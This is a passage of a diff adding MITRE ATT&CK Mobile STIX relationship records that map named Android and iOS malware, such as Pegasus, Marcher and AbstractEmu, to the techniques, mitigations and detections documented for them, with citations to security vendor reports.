+ "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:52:41.579Z", + "relationship_type": 
"revoked-by", + "source_ref": "attack-pattern--a5de0540-73e7-4c67-96da-4143afedc7ed", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--64ddcf35-dbf0-4b9f-bf07-1e0bde8bbe65", + "type": "relationship", + "created": "2021-04-19T17:05:42.574Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2021-04-19T17:05:42.574Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has collected files from the infected device.(Citation: Lookout Uyghur Campaign)\t", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d700c625-d0b6-4570-a538-0ba57bd7bda5", + "created": "2023-03-20T18:50:21.296Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:50:21.296Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e75c623a-f9ac-4f46-b093-dd0e40b50cc6", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Proofpoint-Marcher", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Marcher](https://attack.mitre.org/software/S0317) attempts to overlay itself on top of legitimate banking apps in an effort to capture user credentials. [Marcher](https://attack.mitre.org/software/S0317) also attempts to overlay itself on top of legitimate apps such as the Google Play Store in an effort to capture user credit card information.(Citation: Proofpoint-Marcher)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f9854ba6-989d-43bf-828b-7240b8a65291", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4d431474-1dcc-4d0e-9906-129eb02f00b3", + "created": "2023-02-06T19:43:43.574Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:43:43.574Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can uninstall itself.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a3c4b392-2879-4f31-9431-3398e034851b", + "created": "2022-04-06T13:52:37.470Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be cautioned against granting administrative access to applications.", + "modified": "2022-04-06T13:52:37.470Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--818b8c2b-bd23-4a83-9970-d42063608699", + "created": "2020-04-24T15:06:33.393Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). 
Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:49:04.950Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect device contacts.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bce64ec2-43d5-4501-a0aa-0abe65551a19", + "type": "relationship", + "created": "2021-02-17T20:43:52.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." 
+ } + ], + "modified": "2021-02-17T20:43:52.381Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has retrieved account information for other applications.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a8ac5084-5631-4670-8ac6-6fbe7bdb0a84", + "type": "relationship", + "created": "2019-07-10T15:35:43.708Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.797Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) tracks the latitude and longitude coordinates of the infected device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--718a612e-50c5-40ab-9081-b88cefeafcb6", + "created": "2021-04-26T15:33:55.905Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CitizenLab Circles", + "url": "https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/", + "description": "Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. Retrieved December 23, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Circles](https://attack.mitre.org/software/S0602) can track the location of mobile devices.(Citation: CitizenLab Circles)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24", + "target_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d76d838b-bbc7-459a-884a-2da8c36a2ba2", + "created": "2022-04-08T16:29:55.322Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-08T16:29:55.322Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b332a960-3c04-495a-827f-f17a5daed3a6", + "target_ref": "attack-pattern--a91262d5-b9ff-463f-b8d2-12e4ea1eb3c9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--82555171-8b78-40f3-84d9-058359ae808a", + "type": "relationship", + "created": "2020-09-24T15:34:51.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. 
Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "modified": "2020-09-24T15:34:51.244Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can send and block SMS messages.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b641e5b8-5981-452a-99f0-3598c783e5ee", + "created": "2019-08-07T15:57:13.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:30:47.506Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can intercept incoming SMS messages.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8d72c224-0cf5-4b9b-a98a-76ee3a406803", + "created": "2023-02-06T19:05:00.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + 
"description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:20:37.796Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can obtain a list of installed applications.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a46c3b05-07d5-461c-b1b1-4a81912b79f8", + "created": "2023-02-06T18:59:15.881Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:21:10.915Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can collect device information such as manufacturer, model, version, serial number, and telephone number.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--69718f1d-7761-41ae-b9d0-12c45f6b4ac4", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. 
Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:33:51.882Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) modifies the system partition to maintain persistence.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b7c8abf7-d4e4-40a4-aa2a-ee995a6f4f10", + "created": "2023-03-03T15:36:15.840Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T15:36:15.840Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can access device call logs.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e08820f-a81d-480e-9e60-f14db3e49080", + "type": "relationship", + "created": "2019-09-04T14:28:15.909Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.568Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can take photos and videos.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cce5d90f-edff-454d-bafa-caf33b71ed6c", + "type": "relationship", + "created": "2019-12-10T16:07:41.078Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." 
+ } + ], + "modified": "2019-12-10T16:07:41.078Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) attempts to gain root access by using local exploits.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0993769f-63fb-4720-bbcf-e6f37f71515e", + "type": "relationship", + "created": "2020-06-02T14:32:31.875Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." 
+ } + ], + "modified": "2020-06-02T14:32:31.875Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect the device’s name, serial number, iOS version, total disk space, and free disk space.(Citation: Google Project Zero Insomnia) ", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d3e6bc20-1f9c-41b6-89f0-ef95689add86", + "created": "2023-03-20T15:16:43.275Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:16:43.275Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a04dfb58-b7d3-4abe-9f4a-fad4f7158965", + "type": "relationship", + "created": "2020-04-08T15:51:25.106Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020." 
+ } + ], + "modified": "2020-04-08T15:51:25.106Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can obtain a list of installed applications.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--20376a7f-897a-4f5d-a87a-93e64200a5a6", + "type": "relationship", + "created": "2020-07-20T13:27:33.553Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.518Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) sends the device’s IMEI with each exfiltration request.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ede5c314-5988-4151-bb30-b6a6983d02c0", + "created": "2020-12-31T18:25:05.164Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. 
Retrieved December 31, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has been distributed as updates to legitimate applications. This was accomplished by compromising legitimate app developers, and subsequently gaining access to their Google Play Store developer account.(Citation: CYBERWARCON CHEMISTGAMES)", + "modified": "2022-04-15T15:16:53.317Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1822e616-ae33-487c-8aa6-4fa81e724184", + "created": "2021-02-08T16:36:20.785Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. 
Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:06:22.576Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included contact list exfiltration in the malicious apps deployed as part of Operation BULL.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f390ee16-a7c8-4ef2-b6f4-28940a8f0d81", + "created": "2023-03-20T15:45:44.000Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:45:44.000Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9dec6b2f-790a-4da9-86c9-1f4b7141c32c", + "type": "relationship", + "created": "2019-09-04T15:38:56.562Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "K. Lu. (n.d.). 
Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "source_name": "FortiGuard-FlexiSpy" + } + ], + "modified": "2019-10-14T18:08:28.500Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can communicate with the command and control server over ports 12512 and 12514.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d9aab2e1-31e0-45b2-a40b-0cbe60677b4b", + "created": "2020-11-24T18:18:33.772Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. 
